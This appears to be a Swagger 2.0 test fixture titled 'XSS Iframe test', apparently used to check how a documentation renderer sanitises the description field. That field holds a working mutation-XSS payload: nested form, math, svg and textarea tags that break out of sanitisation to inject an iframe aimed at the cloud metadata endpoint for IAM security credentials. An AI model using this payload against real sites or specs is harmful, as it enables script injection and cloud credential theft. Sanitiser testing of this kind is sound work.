swagger: '2.0'
info:
  title: XSS Iframe test
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><iframe src=http://169.254.169.254/latest/meta-data/iam/security-credentials>"></form>
